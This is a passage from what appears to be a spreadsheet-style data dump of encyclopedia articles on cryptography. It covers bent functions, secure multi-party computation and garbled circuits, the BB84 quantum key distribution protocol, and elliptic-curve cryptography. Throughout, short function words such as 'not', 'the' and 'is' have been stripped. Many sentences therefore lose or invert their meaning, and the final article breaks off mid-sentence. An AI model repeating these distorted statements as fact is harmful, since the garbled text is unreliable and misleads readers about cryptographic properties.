{g}}(a)=2^{\frac {n}{2}}(-1)^{f(a)}} considered dual functions.every bent function hamming weight (number times takes value 2n−1 2n⁄2−1, fact agrees affine function numbers points. nonlinearity (minimum number times equals affine function) 2n−1 2n⁄2−1, maximum possible. conversely, boolean function nonlinearity 2n−1 2n⁄2−1 bent. degree algebraic normal form (called nonlinear order (for 2).although bent functions vanishingly rare among boolean functions many variables, come many different kinds. there detailed research special classes bent functions, homogeneous ones arising monomial finite field, bent functions defied attempts complete enumeration classification. constructions there several types constructions bent functions. combinatorial constructions: iterative constructions, maiorana–mcfarland construction, partial spreads, dillon's dobbertin's bent functions, minterm bent functions, bent iterative functions algebraic constructions: monomial bent functions exponents gold, dillon, kasami, canteaut–leander canteaut–charpin–kuyreghyan; niho bent functions, etc. applications early 1982 discovered maximum length sequences based bent functions cross-correlation autocorrelation properties rivalling gold codes kasami codes cdma. these sequences several applications spread spectrum techniques. properties bent functions naturally interest modern digital cryptography, seeks obscure relationships input output. 1988 forré recognized walsh transform function used show satisfies strict avalanche criterion (sac) higher-order generalizations, recommended tool select candidates good s-boxes achieving near-perfect diffusion. indeed, functions satisfying highest possible order always bent. furthermore, bent functions possible called linear structures, nonzero vectors f(x) constant. language differential cryptanalysis (introduced property discovered) derivative bent function every nonzero point (that fa(x) f(x)) balanced boolean function, taking value exactly half time. this property called perfect nonlinearity.given good diffusion properties, apparently perfect resistance differential cryptanalysis, resistance definition linear cryptanalysis, bent functions might first seem ideal choice secure cryptographic functions s-boxes. their fatal flaw fail balanced. particular, invertible s-box cannot constructed directly bent functions, stream cipher using bent combining function vulnerable correlation attack. instead, might start bent function randomly complement appropriate values result balanced. modified function still high nonlinearity, functions rare process much faster brute-force search. functions produced lose desirable properties, even failing satisfy careful testing necessary. number cryptographers worked techniques generating balanced functions preserve many good cryptographic qualities bent functions possible.some theoretical research incorporated real cryptographic algorithms. cast design procedure, used carlisle adams stafford tavares construct s-boxes block ciphers cast-128 cast-256, makes bent functions. cryptographic hash function haval uses boolean functions built representatives four equivalence classes bent functions variables. stream cipher grain uses nlfsr whose nonlinear feedback polynomial design, bent function linear function. generalizations more different generalizations bent functions described tokareva's 2015 monograph. there algebraic generalizations (q-valued bent functions, p-ary bent functions, bent functions finite field, generalized boolean bent functions schmidt, bent functions finite abelian group complex numbers unit circle, bent functions finite abelian group finite abelian group, non-abelian bent functions, vectorial g-bent functions, multidimensional bent functions finite abelian group), combinatorial generalizations (symmetric bent functions, homogeneous bent functions, rotation symmetric bent functions, normal bent functions, self-dual anti-self-dual bent functions, partially defined bent functions, plateaued functions, z-bent functions quantum bent functions) cryptographic generalizations (semi-bent functions, balanced bent functions, partially bent functions, hyper-bent functions, bent functions higher order, k-bent functions). common class generalized bent functions type, {\displaystyle f:\mathbb _{m}^{n}\to \mathbb _{m}} {\displaystyle {\hat {f}}(a)=\sum _{x\in \mathbb _{m}^{n}}e^{{\frac {2\pi i}{m}}(f(x)-a\cdot x)}} constant absolute value mn/2. perfect nonlinear functions {\displaystyle f:\mathbb _{m}^{n}\to \mathbb _{m}} nonzero f(a) takes value times, generalized bent. prime, converse true. cases prime considered. prime generalized bent functions every positive even odd. they many good cryptographic properties binary bent functions.semi-bent functions odd-order counterpart bent functions. semi-bent function {\displaystyle f:\mathbb _{m}^{n}\to \mathbb _{m}} odd, {\displaystyle \left|{\hat {f}}\right|} takes values m(n+1)/2. they also good cryptographic characteristics, balanced, taking possible values equally often.the partially bent functions form large class defined condition walsh transform autocorrelation functions. affine bent functions partially bent. this turn proper subclass plateaued functions.the idea behind hyper-bent functions maximize minimum distance boolean functions coming bijective monomials finite field gf(2n), affine functions. functions distance constant, make resistant interpolation attack. other related names given cryptographically important classes functions {\displaystyle f:\mathbb _{2}^{n}\to \mathbb _{2}^{n}} almost bent functions crooked functions. while bent functions (these even boolean functions), closely related bent functions good nonlinearity properties. also correlation immunity references further reading carlet (may 1993). classes bent functions. eurocrypt '93. 77–101. seberry; zhang (march 1994). "constructions bent functions known bent functions". australasian journal combinatorics. 21–35. citeseerx 10.1.1.55.531. issn 1034-4942. neumann (may 2006). "bent functions". citeseerx 10.1.1.85.8731. {{cite journal}}: cite journal requires |journal= (help) colbourn, charles dinitz, jeffrey (2006). handbook combinatorial designs (2nd ed.). press. 337–339. isbn 978-1-58488-506-1. cusick, t.w.; stanica, (2009). cryptographic boolean functions applications. academic press. isbn 9780123748904.</t>
  </si>
  <si>
    <t>Secure multi-party computation</t>
  </si>
  <si>
    <t>secure multi-party computation (also known secure computation, multi-party computation (mpc) privacy-preserving computation) subfield cryptography goal creating methods parties jointly compute function inputs keeping inputs private. unlike traditional cryptographic tasks, cryptography assures security integrity communication storage adversary outside system participants eavesdropper sender receiver), cryptography model protects participants' privacy other. foundation secure multi-party computation started late 1970s work mental poker, cryptographic work simulates game playing/computational tasks distances without requiring trusted third party. note traditionally, cryptography concealing content, type computation protocol concealing partial information data computing data many sources, correctly producing outputs. late 1980s, michael ben-or, shafi goldwasser wigderson, independently david chaum, claude crépeau, ivan damgård, published papers showing "how securely compute function secure channels setting". history special purpose protocols specific tasks started late 1970s. later, secure computation formally introduced secure two-party computation (2pc) 1982 (for so-called millionaires' problem, specific problem boolean predicate), generality (for feasible computation) 1986 andrew yao. area also referred secure function evaluation (sfe). party case followed generalization multi-party goldreich, micali wigderson. computation based secret sharing inputs zero-knowledge proofs potentially malicious case, majority honest players malicious adversary case assure behavior detected computation continues dishonest person eliminated input revealed. this work suggested basic general scheme followed essentially future multi-party protocols secure computing. this work introduced approach, known paradigm, compiling multi-party computation protocol secure semi-honest adversaries protocol secure malicious adversaries. this work followed first robust secure protocol tolerates faulty behavior graciously without revealing anyone's output work invented purpose often used `share shares idea' protocol allows parties hide input unconditionally. paradigm considered inefficient years huge overheads brings base protocol. however, shown possible achieve efficient protocols, makes line research even interesting practical perspective. results model adversary limited polynomial time computations, observes communications, therefore model called `computational model'. further, protocol oblivious transfer shown complete tasks. results established possible variations achieve secure computation majority users honest. next question solve case secure communication channels point-to-point communication available adversary; case shown solutions achieved parties misbehaving malicious, solutions apply cryptographic tools (since secure communication available). adding broadcast channel allows system tolerate misbehaving minority, whereas connectivity constraints communication graph investigated book perfectly secure message transmission.over years, notion general purpose multi-party protocols became fertile area investigate basic general protocol issues properties universal composability mobile adversary proactive secret sharing.since late 2000s, certainly since 2010 domain general purpose protocols moved deal efficiency improvements protocols practical applications mind. increasingly efficient protocols proposed, considered practical solution various real-life problems (especially ones require linear sharing secrets mainly local operations shares much interactions among parties), distributed voting, private bidding auctions, sharing signature decryption functions private information retrieval. first large-scale practical application multi-party computation (demonstrated actual auction problem) took place denmark january 2008. obviously, theoretical notions investigations, applied constructions needed (e.g., conditions moving part business advocated presented in). 2020, number companies working secure-multiparty computation founded alliance goal "accelerate awareness, acceptance, adoption technology." definition overview mpc, given number participants, ..., private data, respectively ..., participants want compute value public function private data: f(d1, ..., keeping inputs secret. example, suppose three parties alice, charlie, respective inputs denoting salaries. they want find highest three salaries, without revealing much makes. mathematically, translates computing: f(x, max(x, z)if trusted outside party (say, mutual friend tony knew could keep secret), could tell salary tony, could compute maximum, tell number them. goal design protocol, where, exchanging messages other, alice, bob, charlie still learn f(x, without revealing makes without rely tony. they learn engaging protocol would learn interacting incorruptible, perfectly trustworthy tony. particular, parties learn learn output input. example, output charlie learns maximum value, whereas alice learn distinct), input equal maximum, maximum held equal basic scenario easily generalised parties several inputs outputs, function outputs different values different parties. informally speaking, basic properties multi-party computation protocol aims ensure are: input privacy: information private data held parties inferred messages sent execution protocol. information inferred private data whatever could inferred seeing output function alone. correctness: proper subset adversarial colluding parties willing share information deviate instructions protocol execution able force honest parties output incorrect result. this correctness goal comes flavours: either honest parties guaranteed compute correct output “robust” protocol), abort find error protocol “with abort”).there wide range practical applications, varying simple tasks coin tossing complex ones like electronic auctions (e.g. compute market clearing price), electronic voting, privacy-preserving data mining. classical example millionaires' problem: millionaires want know richer, neither learns worth other. solution situation essentially securely evaluate comparison function. security definitions multi-party computation protocol must secure effective. modern cryptography, security protocol related security proof. security proof mathematical proof security protocol reduced security underlying primitives. nevertheless, always possible formalize cryptographic protocol security verification based party knowledge protocol correctness. protocols, environment protocol operates associated real world/ideal world paradigm. parties can't said learn nothing, since need learn output operation, output depends inputs. addition, output correctness guaranteed, since correctness output depends parties’ inputs, inputs assumed correct. real world/ideal world paradigm states worlds: ideal-world model, exists incorruptible trusted party protocol participant sends input. this trusted party computes function sends back appropriate output party. (ii) contrast, real-world model, trusted party parties exchange messages other. protocol said secure learn party's private inputs real world could learn ideal world. ideal world, messages exchanged parties, real-world exchanged messages cannot reveal secret information. real world/ideal world paradigm provides simple abstraction complexities allow construction application pretense protocol core actually ideal execution. application secure ideal case, also secure real protocol instead. security requirements protocol stringent. nonetheless, 1987 demonstrated function securely computed, security malicious adversaries initial works mentioned before. despite publications, designed efficient enough used practice time. unconditionally information-theoretically secure closely related builds problem secret sharing, specifically verifiable secret sharing (vss), many secure protocols active adversaries. unlike traditional cryptographic applications, encryption signature, must assume adversary protocol players engaged system controlling internal parties). that corrupted party parties collude order breach security protocol. {\displaystyle number parties protocol {\displaystyle number parties adversarial. protocols solutions case {\displaystyle t&lt;n/2} (i.e., honest majority assumed) different assumption made. this latter case includes important case two-party computation participants corrupted, general case unlimited number participants corrupted collude attack honest participants. adversaries faced different protocols categorized according willing deviate protocol. there essentially types adversaries, giving rise different forms security (and fits different real world scenario): semi-honest (passive) security: case, assumed corrupted parties merely cooperate gather information protocol, deviate protocol specification. this naive adversary model, yielding weak security real situations. however, protocols achieving level security prevent inadvertent leakage information (otherwise collaborating) parties, thus useful concern. addition, protocols semi-honest model quite efficient, often important first step achieving higher levels security. malicious (active) security: case, adversary arbitrarily deviate protocol execution attempt cheat. protocols achieve security model provide high security guarantee. case majority misbehaving parties: thing adversary case dishonest majority cause honest parties “abort” detected cheating. honest parties obtain output, guaranteed correct. their privacy always preserved.security active adversaries typically leads reduction efficiency leads covert security, relaxed form active security. covert security captures realistic situations, active adversaries willing cheat caught. example, reputation could damaged, preventing future collaboration honest parties. thus, protocols covertly secure provide mechanisms ensure that, parties follow instructions, noticed high probability, 90%. way, covert adversaries active ones forced passively external non-cryptographic (e.g. business) concerns. this mechanism sets bridge models hope finding protocols efficient secure enough practice. like many cryptographic protocols, security protocol rely different assumptions: computational (i.e. based mathematical problem, like factoring) unconditional, namely relying physical unavailability messages channels (usually probability error made arbitrarily small). model might assume participants synchronized network, message sent "tick" always arrives next "tick", secure reliable broadcast channel exists, secure communication channel exists every pair participants adversary cannot read, modify generate messages channel, etc.the honest parties execute computational task related concept access structure. adversary structures static, adversary chooses victims start multi-party computation, dynamic, chooses victims course execution multi-party computation making defense harder. adversary structure defined threshold structure complex structure. threshold structure adversary corrupt read memory number participants threshold. meanwhile, complex structure affect certain predefined subsets participants, modeling different possible collusions. protocols there major differences protocols proposed party computation (2pc) multi-party computation (mpc). also, often special purpose protocols importance specialized protocol deviates generic ones designed (voting, auctions, payments, etc.) two-party computation party setting particularly interesting, applications perspective also special techniques applied party setting apply multi-party case. indeed, secure multi-party computation fact restricted case secure function evaluation, single function evaluated) first presented two-party setting. original work often cited papers yao; although papers actually contain known yao's garbled circuit protocol. yao's basic protocol secure semi-honest adversaries extremely efficient terms number rounds, constant, independent target function evaluated. function viewed boolean circuit, inputs binary fixed length. boolean circuit collection gates connected three different types wires: circuit-input wires, circuit-output wires intermediate wires. each gate receives input wires single output wire might fan-out (i.e. passed multiple gates next level). plain evaluation circuit done evaluating gate turn; assuming gates topologically ordered. gate represented truth table possible pair bits (those coming input wires' gate) table assigns unique output bit; value output wire gate. results evaluation bits obtained circuit-output wires. explained garble circuit (hide structure) parties, sender receiver, learn output circuit nothing else. high level, sender prepares garbled circuit sends receiver, obliviously evaluates circuit, learning encodings corresponding sender's output. sends back sender's encodings, allowing sender compute part output. sender sends mapping receivers output encodings bits receiver, allowing receiver obtain output. detail, garbled circuit computed follows. main ingredient double-keyed symmetric encryption scheme. given gate circuit, possible value input wires (either encoded random number (label). values resulting evaluation gate four possible pair input bits also replaced random labels. garbled truth table gate consists encryptions output label using inputs labels keys. position four encryptions truth table randomized information gate leaked. correctly evaluate garbled gate encryption scheme following properties. firstly, ranges encryption function distinct keys disjoint (with overwhelming probability). second property says checked efficiently whether given ciphertext encrypted given key. with properties receiver, obtaining labels circuit-input wires, evaluate gate first finding four ciphertexts encrypted label keys, decrypting obtain label output wire. this done obliviously receiver learns evaluation encodings bits. sender's (i.e. circuit creators) input bits sent encodings evaluator; whereas receiver's (i.e. circuit evaluators) encodings corresponding input bits obtained 1-out-of-2 oblivious transfer (ot) protocol. 1-out-of-2 protocol, enables sender, possession values send requested receiver value {1,2}) sender know value transferred, receiver learns queried value. considering malicious adversaries, mechanisms ensure correct behavior parties need provided. construction easy show security sender protocol already secure malicious adversary, receiver evaluate garbled circuit would fail reach circuit-output wires deviated instructions. situation different sender's side. example, send incorrect garbled circuit computes function revealing receiver's input. this would mean privacy longer holds, since circuit garbled receiver would able detect this. however, possible efficiently apply zero-knowledge proofs make protocol secure malicious adversaries small overhead comparing semi-honest protocol. multi-party protocols most protocols, opposed protocols especially unconditional setting private channels, make secret sharing. secret sharing based methods, parties play special roles yao, creator evaluator). instead, data associated wire shared amongst parties, protocol used evaluate gate. function defined “circuit” finite field, opposed binary circuits used yao. such circuit called arithmetic circuit literature, consists addition multiplication “gates” values operated defined finite field. secret sharing allows distribute secret among number parties distributing shares party. types secret sharing schemes commonly used; shamir secret sharing additive secret sharing. cases shares random elements finite field secret field; intuitively, security achieved non-qualifying shares looks randomly distributed. secret sharing schemes tolerate adversary controlling parties total parties, varies based scheme, adversary passive active, different assumptions made power adversary. shamir secret sharing scheme secure passive adversary {\displaystyle t&lt;{\frac {n}{2}}} active adversary {\displaystyle t&lt;{\frac {n}{3}}} achieving information-theoretic security, meaning even adversary unbounded computational power, cannot learn information secret underlying share. protocol, defines compute addition multiplication secret shares, often used compute functions shamir secret shares. additive secret sharing schemes tolerate adversary controlling party, {\displaystyle t&lt;n} maintaining security passive active adversary unbounded computational power. some protocols require setup phase, secure computationally bounded adversary. number systems implemented various forms secret sharing schemes. popular spdz, implements additive secret shares secure active adversaries. other protocols 2014 "model fairness secure computation adversarial party aborts receiving output forced mutually predefined monetary penalty" described bitcoin network fair lottery. practical systems many advances made systems recent years. yao-based protocols main issues working yao-based protocols function securely evaluated (which could arbitrary program) must represented circuit, usually consisting gates. since real-world programs contain loops complex data structures, highly non-trivial task. fairplay system first tool designed tackle problem. fairplay comprises main components. first compiler enabling users write programs simple high-level language, output programs boolean circuit representation. second component garble circuit execute protocol securely evaluate garbled circuit. well two-party computation based yao's protocol, fairplay also carry multi-party protocols. this done using protocol, extends yao's passively secure protocol active case. years following introduction fairplay, many improvements yao's basic protocol created, form efficiency improvements techniques active security. these include techniques free method, allows much simpler evaluation gates, garbled reduction, reducing size garbled tables inputs 25%.the approach seems fruitful obtaining active security comes combination garbling technique “cut-and-choose” paradigm. this combination seems render efficient constructions. avoid aforementioned problems respect dishonest behaviour, many garblings circuit sent constructor evaluator. then around half (depending specific protocol) opened check consistency, vast majority unopened ones correct high probability. output majority vote evaluations. note majority output needed. disagreement outputs receiver knows sender cheating, cannot complain otherwise would leak information input. this approach active security initiated lindell pinkas. this technique implemented pinkas 2009, this provided first actively secure two-party evaluation advanced encryption standard (aes) circuit, regarded highly complex (consisting around 30,000 gates), non-trivial function (also potential applications), taking around minutes compute requiring circuits obtain {\displaystyle 2^{-40}} cheating probability. many circuits evaluated, parties (including receiver) need commit inputs ensure iterations values used. experiments pinkas reported show bottleneck protocol lies consistency checks. they send 6,553,600 commitments various values evaluate circuit. recent results efficiency actively secure yao-based implementations improved even further, requiring circuits, much less commitments, obtain {\displaystyle 2^{-40}} cheating probability. improvements come methodologies performing cut-and-choose transmitted circuits. more recently, focus highly parallel implementations based garbled circuits, designed cpus many cores. kreuter, describe implementation running cores powerful cluster computer. using resources could evaluate 4095-bit edit distance function, whose circuit comprises almost billion gates. accomplish developed custom, better optimized circuit compiler fairplay several optimizations pipelining, whereby transmission garbled circuit across network begins rest circuit still generated. time compute reduced seconds block active case, using 512-node cluster machine, seconds using node. shelat shen improve this, using commodity hardware, 0.52 seconds block. paper reports throughput blocks second, latency seconds block. meanwhile, another group researchers investigated using consumer-grade gpus achieve similar levels parallelism. they utilize extensions novel techniques design gpu-specific protocol. this approach seems achieve comparable efficiency cluster computing implementation, using similar number cores. however, authors report implementation circuit, around 50,000 gates. hand, hardware required accessible, similar devices already found many people's desktop computers games consoles. authors obtain timing seconds block standard desktop, standard gpu. allow security decrease something akin covert security, obtain time 0.30 seconds block. passive security case reports processing circuits million gates, rate million gates second. also private intersection digital currency homomorphic encryption mental poker multi-party fair exchange protocol oblivious transfer privacy-preserving computational geometry yao's millionaires' problem privacy-enhancing technologies references external links simple description millionaire problem helger lipmaa's links multiparty computation nick szabo, "the protocols" wayback machine (archived december 2006) emp-toolkit efficient multi-party computation toolkit. includes implementation basic primitives well protocols semi-honest security malicious security. secure distributed (discsp) solvers web-application applet-interpreter design full-fledged secure multiparty computation (based declarative language). uses secure arithmetic circuit evaluation mix-nets. vmcrypt java library scalable secure computation. lior malka. fairplay project includes software package secure two-party computation, function defined using high-level function description language, evaluated using yao's protocol secure evaluation boolean circuits. simap project; secure information management processing (simap) project sponsored danish national research agency aimed implementing secure multiparty computation. secure multiparty computation language project development 'domain specific programming language secure multiparty computation' associated cryptographic runtime. viff: virtual ideal functionality framework framework asynchronous multi-party computations (code available lgpl). offers arithmetic secret shared values including secure comparison. mpyc: secure multiparty computation python (and jupyter notebooks) open-source package using customized type python coroutines, supporting advanced applications decision trees, linear programming, cnn/mlp neural networks, aes, one-way hash chains, many more. launched 2018. scale-mamba mpc: secure computation algorithms leuven framework various protocols, including spdz family (code available bsd). offers arithmetic secret shared values including secure comparison support fixed point floating point arithmetic. sharemind: analyze confidential data without compromising privacy distributed virtual machine capability privacy-preserving operations. privacy-preserving programming language data mining tools. includes developer tools. mpclib: multi-party computation library library written implements several building blocks required implementing secure multi-party computation protocols. mpclib discrete-event simulation engine used simulating protocols virtual networks. virtual parties protocol virtual parties (secure multi party computation) java-based implementation java-based implementation protocol based michael.b, shafi.g avi.w's theorem ("completeness theorems non-cryptographic fault-tolerant distributed computation") welch-berlekamp error correcting code algorithm codes. supports multiple players identification "cheaters" byzantine protocol. erez alon, doron friedland yael smith. sepia java library using secret sharing. basic operations optimized large numbers parallel invocations (code available lgpl). introduction github myst project javacard applet implementing secure multiparty generation, signing decryption. essential bibliography secure multiparty computation</t>
  </si>
  <si>
    <t>BB84</t>
  </si>
  <si>
    <t>bb84 quantum distribution scheme developed charles bennett gilles brassard 1984. first quantum cryptography protocol. protocol provably secure, relying conditions: quantum property information gain possible expense disturbing signal states trying distinguish orthogonal (see no-cloning theorem); existence authenticated public classical channel. usually explained method securely communicating private party another one-time encryption. description bb84 scheme, alice wishes send private bob. begins strings bits, {\displaystyle {\displaystyle {\displaystyle bits long. encodes strings tensor product {\displaystyle qubits: {\displaystyle |\psi \rangle =\bigotimes _{i=1}^{n}|\psi _{a_{i}b_{i}}\rangle {\displaystyle a_{i}} {\displaystyle b_{i}} {\displaystyle bits {\displaystyle {\displaystyle respectively. together, {\displaystyle a_{i}b_{i}} give index following four qubit states: {\displaystyle |\psi _{00}\rangle =|0\rangle {\displaystyle |\psi _{10}\rangle =|1\rangle {\displaystyle |\psi _{01}\rangle =|+\rangle ={\frac {1}{\sqrt {2}}}|0\rangle +{\frac {1}{\sqrt {2}}}|1\rangle {\displaystyle |\psi _{11}\rangle =|-\rangle ={\frac {1}{\sqrt {2}}}|0\rangle -{\frac {1}{\sqrt {2}}}|1\rangle note {\displaystyle b_{i}} decides basis {\displaystyle a_{i}} encoded (either computational basis hadamard basis). qubits states mutually orthogonal, thus impossible distinguish certainty without knowing {\displaystyle alice sends {\displaystyle |\psi \rangle public authenticated quantum channel {\displaystyle {\mathcal {e}}} bob. receives state {\displaystyle {\mathcal {e}}(\rho )={\mathcal {e}}(|\psi \rangle \langle \psi {\displaystyle {\mathcal {e}}} represents effects noise channel eavesdropping third party we'll call eve. after receives string qubits, states. however, since alice knows {\displaystyle makes virtually impossible either distinguish states qubits. also, received qubits, know cannot possession copy qubits sent bob, no-cloning theorem, unless made measurements. measurements, however, risk disturbing particular qubit probability guesses wrong basis. proceeds generate string random bits {\displaystyle length {\displaystyle measures qubits received alice, obtaining string {\displaystyle point, announces publicly received alice's transmission. alice knows safely announce {\displaystyle i.e., bases qubits prepared. communicates public channel alice determine {\displaystyle b_{i}} {\displaystyle b'_{i}} equal. both alice discard bits {\displaystyle {\displaystyle {\displaystyle {\displaystyle match. from remaining {\displaystyle bits alice measured basis, alice randomly chooses {\displaystyle k/2} bits discloses choices public channel. both alice announce bits publicly check whether certain number agree. check passes, alice proceed information reconciliation privacy amplification techniques create number shared secret keys. otherwise, cancel start over. also sarg04 quantum cryptographic communication protocol references</t>
  </si>
  <si>
    <t>Elliptic-curve cryptography</t>
  </si>
  <si>
    <t>elliptic-curve cryptography (ecc) approach public-key cryptography based algebraic structure elliptic curves finite fields. allows smaller keys compared non-ec cryptography (based plain galois fields) provide equivalent security.elliptic curves applicable agreement, digital signatures, pseudo-random generators tasks. indirectly, used encryption combining agreement symmetric encryption scheme. elliptic curves also used several integer factorization algorithms based elliptic curves applications cryptography, lenstra elliptic-curve factorization. rationale public-key cryptography based intractability certain mathematical problems. early public-key systems based security assumption difficult factor large integer composed large prime factors. later elliptic-curve-based protocols, base assumption finding discrete logarithm random elliptic curve element respect publicly known base point infeasible: "elliptic curve discrete logarithm problem" (ecdlp). security elliptic curve cryptography depends ability compute point multiplication inability compute multiplicand given original product points. size elliptic curve, measured total number discrete integer pairs satisfying curve equation, determines difficulty problem. u.s. national institute standards technology (nist) endorsed elliptic curve cryptography suite recommended algorithms, specifically elliptic-curve diffie–hellman (ecdh) exchange elliptic curve digital signature algorithm (ecdsa) digital signature. u.s. national security agency (nsa) allows protecting information classified secret 384-bit keys. however, august 2015, announced plans replace suite cipher suite concerns quantum computing attacks ecc.while patent expired 2000, patents force covering certain aspects technology. however argue government elliptic curve digital signature standard (ecdsa; nist fips 186-3) certain practical ecc-based exchange schemes (including ecdh) implemented without infringing them, including laboratories daniel bernstein.the primary benefit promised elliptic curve cryptography smaller size, reducing storage transmission requirements, i.e. elliptic curve group could provide level security afforded rsa-based system large modulus correspondingly larger key: example, 256-bit elliptic curve public provide comparable security 3072-bit public key. history elliptic curves cryptography suggested independently neal koblitz victor miller 1985. elliptic curve cryptography algorithms entered wide 2004 2005. theory current cryptographic purposes, elliptic curve plane curve finite field real number domain (not imaginary domain)) consists points satisfying equation: {\displaystyle y^{2}=x^{3}+ax+b,\,} along distinguished point infinity, denoted coordinates chosen fixed finite field characteristic equal curve equation somewhat complicated. this together group operation elliptic curves abelian group, point infinity identity element. structure group inherited divisor group underlying algebraic variety: {\displaystyle \mathrm {div} ^{0}(e)\to \mathrm {pic} ^{0}(e)\simeq e,\,} cryptographic schemes several discrete logarithm-based protocols adapted elliptic curves, replacing group {\displaystyle (\mathbb _{p})^{\times elliptic curve: elliptic curve diffie–hellman (ecdh) agreement scheme based diffie–hellman scheme, elliptic curve integrated encryption scheme (ecies), also known elliptic curve augmented encryption scheme simply elliptic curve encryption scheme, elliptic curve digital signature algorithm (ecdsa) based digital signature algorithm, deformation scheme using harrison's p-adic manhattan metric, edwards-curve digital signature algorithm (eddsa) based schnorr signature uses twisted edwards curves, ecmqv agreement scheme based agreement scheme, ecqv implicit certificate scheme.at conference 2005, national security agency (nsa) announced suite exclusively uses digital signature generation exchange. suite intended protect classified unclassified national security systems information.recently, large number cryptographic primitives based bilinear mappings various elliptic curve groups, weil tate pairings, introduced. schemes based primitives provide efficient identity-based encryption well pairing-based signatures, signcryption, agreement, proxy re-encryption. implementation some common implementation considerations include: domain parameters ecc, parties must agree elements defining elliptic curve, domain parameters scheme. size field used typically either prime (and denoted power {\displaystyle 2^{m}} latter case called binary case, also necessitates choice auxiliary curve denoted thus field defined prime case pair binary case. elliptic curve defined constants used defining equation. finally, cyclic subgroup defined generator (a.k.a. base point) cryptographic application order smallest positive number {\displaystyle ng={\mathcal {o}}} (the point infinity curve, identity element), normally prime. since size subgroup {\displaystyle e(\mathbb _{p})} follows lagrange's theorem number {\displaystyle h={\frac {1}{n}}|e(\mathbb _{p})|} integer. cryptographic applications number called cofactor, must small {\displaystyle h\leq and, preferably, {\displaystyle h=1} summarize: prime case, domain parameters {\displaystyle (p,a,b,g,n,h)} binary case, {\displaystyle (m,f,a,b,g,n,h)} unless assurance domain parameters generated party trusted respect use, domain parameters must validated use. generation domain parameters usually done participant involves computing number points curve time-consuming troublesome implement. result, several standard bodies published domain parameters elliptic curves several common field sizes. such domain parameters commonly known "standard curves" "named curves"; named curve referenced either name unique object identifier defined standard documents: nist, recommended elliptic curves government secg, recommended elliptic curve domain parameters brainpool (rfc 5639), brainpool standard curves curve generation archived 2018-04-17 wayback machinesecg test vectors also available. nist approved many secg curves, significant overlap specifications published nist secg. domain parameters either specified value name. (despite above) wants construct one's domain parameters, select underlying field following strategies find curve appropriate (i.e., near prime) number points using following methods: select random curve general point-counting algorithm, example, schoof's algorithm schoof–elkies–atkin algorithm, select random curve family allows easy calculation number points (e.g., koblitz curves), select number points generate curve number points using complex multiplication technique.several classes curves weak avoided: curves {\displaystyle \mathbb _{2^{m}}} non-prime vulnerable weil descent attacks. curves divides {\displaystyle p^{b}-1} (where characteristic field: prime field, {\displaystyle binary field) sufficiently small vulnerable menezes–okamoto–vanstone (mov) attack applies usual discrete logarithm problem (dlp) small-degree extension field {\displaystyle \mathbb _{p}} solve ecdlp. bound chosen discrete logarithms field {\displaystyle \mathbb _{p^{b}}} least difficult compute discrete logs elliptic curve {\displaystyle e(\mathbb _{q})} curves {\displaystyle |e(\mathbb _{q})|=q} vulnerable attack maps points curve additive group {\displaystyle \mathbb _{q}} sizes because fastest known algorithms allow solve ecdlp (baby-step giant-step, pollard's rho, etc.), need {\displaystyle o({\sqrt {n}})} steps, follows size underlying field roughly twice security parameter. example, 128-bit security needs curve {\displaystyle \mathbb _{q}} {\displaystyle q\approx 2^{256}} this contrasted finite-field cryptography (e.g., dsa) requires 3072-bit public keys 256-bit private keys, integer factorization cryptography (e.g., rsa) requires 3072-bit value private large. however, public smaller accommodate efficient encryption, especially processing power limited. hardest scheme (publicly) broken date 112-bit prime field case 109-bit binary field case. prime field case, broken july 2009 using cluster playstation game consoles could finished months using cluster running continuously. binary field case broken april 2004 using 2600 computers months.a current project aiming breaking ecc2k-130 challenge certicom, using wide range different hardware: cpus, gpus, fpga. projective coordinates close examination addition rules shows order points, needs several additions multiplications {\displaystyle \mathbb _{q}} also inversion operation. inversion (for given {\displaystyle x\in \mathbb _{q}} find {\displaystyle y\in \mathbb _{q}} {\displaystyle xy=1} orders magnitude slower multiplication. however, points curve represented different coordinate systems require inversion operation points. several systems proposed: projective system point represented three coordinates {\displaystyle (x,y,z)} using following relation: {\displaystyle x={\frac {x}{z}}} {\displaystyle y={\frac {y}{z}}} jacobian system point also represented three coordinates {\displaystyle (x,y,z)} different relation used: {\displaystyle x={\frac {x}{z^{2}}}} {\displaystyle y={\frac {y}{z^{3}}}} lópez–dahab system relation {\displaystyle x={\frac {x}{z}}} {\displaystyle y={\frac {y}{z^{2}}}} modified jacobian system relations used four coordinates stored used calculations {\displaystyle (x,y,z,az^{4})} chudnovsky jacobian system five coordinates used {\displaystyle (x,y,z,z^{2},z^{3})} note different naming conventions, example, ieee p1363-2000 standard uses "projective coordinates" refer commonly called jacobian coordinates. additional speed-up possible mixed coordinates used. fast reduction (nist curves) reduction modulo (which needed addition multiplication) executed much faster prime pseudo-mersenne prime, {\displaystyle p\approx 2^{d}} example, {\displaystyle p=2^{521}-1} {\displaystyle p=2^{256}-2^{32}-2^{9}-2^{8}-2^{7}-2^{6}-2^{4}-1.} compared barrett reduction, order magnitude speed-up. speed-up practical rather theoretical one, derives fact moduli numbers numbers near powers performed efficiently computers operating binary numbers bitwise operations. curves {\displaystyle \mathbb _{p}} pseudo-mersenne recommended nist. another advantage nist curves improves addition jacobian coordinates. according bernstein lange, many efficiency-related decisions nist fips 186-2 suboptimal. other curves secure fast. applications elliptic curves applicable encryption, digital signatures, pseudo-random generators tasks. they also used several integer factorization algorithms applications cryptography, lenstra elliptic-curve factorization. 1999, nist recommended fifteen elliptic curves. specifically, fips 186-4 recommended finite fields: five prime fields {\displaystyle \mathbb _{p}} certain primes sizes 192, 224, 256, 384, bits. prime fields, elliptic curve recommended. five binary fields {\displaystyle \mathbb _{2^{m}}} equal 163, 233, 283, 409, 571. binary fields, elliptic curve koblitz curve selected.the nist recommendation thus contains total five prime curves binary curves. curves ostensibly chosen optimal security implementation efficiency.in 2013, york times stated dual elliptic curve deterministic random generation dual_ec_drbg) included nist national standard influence nsa, included deliberate weakness algorithm recommended elliptic curve. security september 2013 issued advisory recommending customers discontinue using software based dual_ec_drbg. wake exposure dual_ec_drbg undercover operation", cryptography experts also expressed concern security nist recommended elliptic curves, suggesting return encryption based non-elliptic-curve groups. elliptic curve cryptography used cryptocurrency bitcoin.ethereum version makes extensive elliptic curve pairs using signatures—as specified ietf draft specification—for cryptographically assuring specific eth2 validator actually verified particular transaction. security side-channel attacks unlike systems (where possible procedure squaring multiplication), addition significantly different doubling general addition depending coordinate system used. consequently, important counteract side-channel attacks (e.g., timing simple/differential power analysis attacks) using, example, fixed pattern window (a.k.a. comb) methods (note increase computation time). alternatively edwards curve; special family elliptic curves doubling addition done operation. another concern 